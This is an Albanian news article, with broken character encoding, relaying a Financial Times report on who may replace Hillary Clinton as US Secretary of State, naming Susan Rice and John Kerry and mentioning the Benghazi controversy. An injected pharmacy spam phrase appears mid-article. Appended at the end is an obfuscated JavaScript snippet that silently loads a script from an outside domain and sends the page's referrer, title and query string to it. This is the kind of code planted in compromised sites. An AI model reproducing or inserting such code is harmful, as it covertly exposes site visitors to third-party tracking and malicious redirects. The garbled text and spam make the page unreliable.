largea_obama1353403535

Obama sA� shpejti emA�ron kabinetin e ri

Presidenti i Shteteve tA� Bashkuara, Barack Obana, do tA� emA�rojA� sA� shpejti kabinetin e ri, qA� do tA� pA�rbA�jA� administratA�n e tij gjatA� mandatit tA� dytA� presidencial, raporton Financial Times. purchase atomoxetine.

NdA�r vendimet mA� tA� vA�shtira, sipas gazetA�s, pritet tA� jetA� zA�vendA�simi i Hillary Clintonit nA� postin e sekretares amerikane tA� shtetit.

GjatA� katA�r vjetA�ve tA� kaluar, Clinton ka qenA� njA� kryetare energjike e politikA�s sA� jashtme tA� AmerikA�s.

ZA�vendA�simi i saj me dikA� tA� ngjashA�m A�shtA� njA� punA� e vA�shtirA�, shkruan Financial Times.

NA� mesin e emrave qA� mund tA� zgjedhA� Obama, A�shtA� ai i senatorit John Kerry, ish-kandidat i DemokratA�ve pA�r president, dhe ai i ambasadores sA� SHBA-sA� nA� Kombet e Bashkuara, Susan Rice.

Rice ka qenA� njA� diplomate efektive, duke siguruar rezolutat e OKB-sA� pA�r sanksione ndaj Iranit dhe KoresA� sA� Veriut.

Sipas gazetA�s, ndikimi i saj ka qenA� i qartA� vitin e kaluar kur ajo ka ndihmuar nA� bindjen e presidentit Obama pA�r tA� mbA�shtetur aksionet ushtarake mbi LibinA�.

Por, ditA�ve tA� fundit, Rice ka qenA� nA�n sulme tA� vazhdueshme tA� RepublikanA�ve, pA�r shkak tA� komenteve qA� ka bA�rA� nA� lidhje me sulmin ndaj KonsullatA�s amerikane nA� Bengazi, ku kanA� humbur jetA�n katA�r diplomatA� tA� SHBA-sA�, pA�rfshirA� ambasadorin.

Rice fillimisht ka thA�nA� se ambasadori amerikan, Chris Stevens, A�shtA� vrarA� nA� njA� protestA� spontane, e cila mA� pas A�shtA� rrA�mbyer nga ekstremistA�t, dhe jo nga njA� sulm i paramenduar terrorist.

Por, kjo deklaratA�, bazuar nA� tA� dhA�nat e CIA-s, duket se ka qenA� e gabuar.

Rice tani pA�rballet me akuzat se ka mashtruar publikun.

Zoti Obama mund tA� shpenzojA� kapital tA� vlefshA�m politik duke luftuar pA�r emA�rimin e Rice-it. Por, ai do tA� bA�nte mirA� qA� tA� zgjidhte njA� njeri tA� rA�ndA�sishA�m dhe me pA�rvojA� nA� krye tA� diplomacisA� sA� vendit, shkruan Financial Times.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}